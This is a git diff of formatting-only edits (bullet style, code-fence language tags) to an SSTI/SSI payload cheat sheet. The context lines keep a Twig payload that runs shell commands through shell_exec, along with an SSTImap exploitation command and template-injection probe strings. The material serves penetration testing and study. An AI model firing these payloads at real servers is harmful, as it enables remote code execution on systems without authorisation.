diff --git a/Server Side Include Injection/README.md b/Server Side Include Injection/README.md index 5880147e..98268579 100644 --- a/Server Side Include Injection/README.md +++ b/Server Side Include Injection/README.md @@ -11,7 +11,7 @@ ## Tools -- [vladko312/SSTImap](https://github.com/vladko312/SSTImap) - Automatic SSTI detection tool with interactive interface based on [epinna/tplmap](https://github.com/epinna/tplmap), supports SSI detection and exploitation with `--legacy` or `-e SSI` +* [vladko312/SSTImap](https://github.com/vladko312/SSTImap) - Automatic SSTI detection tool with interactive interface based on [epinna/tplmap](https://github.com/epinna/tplmap), supports SSI detection and exploitation with `--legacy` or `-e SSI` ```bash python3 ./sstimap.py -u 'https://example.com/page?name=John' --legacy -s diff --git a/Server Side Template Injection/Java.md b/Server Side Template Injection/Java.md index 2bd3c484..f261d791 100644 --- a/Server Side Template Injection/Java.md +++ b/Server Side Template Injection/Java.md @@ -54,7 +54,7 @@ ### Java EL - Basic Injection -> Java has multiple Expression Languages using similar syntax. +Java has multiple Expression Languages using similar syntax. > Multiple variable expressions can be used, if `${...}` doesn't work try `#{...}`, `*{...}`, `@{...}` or `~{...}`. diff --git a/Server Side Template Injection/PHP.md b/Server Side Template Injection/PHP.md index 299bbc18..11caee80 100644 --- a/Server Side Template Injection/PHP.md +++ b/Server Side Template Injection/PHP.md @@ -167,6 +167,7 @@ $output = $twig > render ( ``` With certain settings, Twig interrupts rendering, if any errors or warnings are raised. This payload works fine in these cases: + ```php {{ {'id':'shell_exec'}|map('call_user_func')|join }} ``` diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index 5d7e34a2..1b0b4af7 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md @@ -53,9 +53,9 @@ Original research: -- Rendered, Time-Based: [Server-Side Template Injection: RCE For The Modern Web App - James Kettle - August 05, 2015](https://portswigger.net/knowledgebase/papers/serversidetemplateinjection.pdf) -- Polyglot-Based: [Improving the Detection and Identification of Template Engines for Large-Scale Template Injection Scanning - Maximilian Hildebrand - September 19, 2023](https://www.hackmanit.de/images/download/thesis/Improving-the-Detection-and-Identification-of-Template-Engines-for-Large-Scale-Template-Injection-Scanning-Maximilian-Hildebrand-Master-Thesis-Hackmanit.pdf) -- Error-Based, Boolean-Based: [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 03, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md) +* Rendered, Time-Based: [Server-Side Template Injection: RCE For The Modern Web App - James Kettle - August 05, 2015](https://portswigger.net/knowledgebase/papers/serversidetemplateinjection.pdf) +* Polyglot-Based: [Improving the Detection and Identification of Template Engines for Large-Scale Template Injection Scanning - Maximilian Hildebrand - September 19, 2023](https://www.hackmanit.de/images/download/thesis/Improving-the-Detection-and-Identification-of-Template-Engines-for-Large-Scale-Template-Injection-Scanning-Maximilian-Hildebrand-Master-Thesis-Hackmanit.pdf) +* Error-Based, Boolean-Based: [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 03, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md) #### Rendered @@ -117,7 +117,7 @@ ${{<%[%'"}}%\. Common tags to test for SSTI with code evaluation: -``` +```powershell {{ ... }} ${ ... } #{ ... } @@ -133,13 +133,13 @@ ${ ... } Rendered SSTI can be checked by using mathematical expressions inside the tags: -``` +```powershell 7 * 7 ``` Error-Based SSTI can be checked by using this payload inside the tags: -``` +```powershell (1/0).zxy.zxy ```